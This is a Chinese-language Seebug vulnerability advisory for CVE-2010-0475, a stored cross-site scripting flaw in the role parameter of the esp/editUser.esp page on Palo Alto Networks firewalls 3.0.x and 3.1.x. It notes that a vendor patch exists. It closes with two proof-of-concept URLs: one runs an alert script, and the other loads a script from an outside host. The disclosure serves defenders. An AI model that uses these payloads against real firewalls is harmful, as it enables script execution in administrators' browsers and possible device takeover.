Palo Alto Networks防火墙esp/editUser.esp页面存储式跨站脚本漏洞

2010-05-18T00:00:00
ID SSV:19648
Type seebug
Reporter Root
Modified 2010-05-18T00:00:00

Description

BUGTRAQ ID: 40113 CVE(CAN) ID: CVE-2010-0475

Palo Alto Networks是新一代的硬件防火墙设备。

Palo Alto Networks防火墙的esp/editUser.esp页面没有正确地过滤用户在URL请求中所提供的role参数,远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击,导致在用户浏览器中执行任意HTML和脚本代码。 0 Palo Alto Networks firewall 3.1.x Palo Alto Networks firewall 3.0.x 厂商补丁:

Palo Alto Networks

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.paloaltonetworks.com

                                        
                                            
                                                https://www.example.com:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT>  &admin-role=%5Bobject+Object%5D&bSubmit=O

https://www.example.com:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT/XSS src="/http://www.jeromiejackson.com/tryme.js"></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O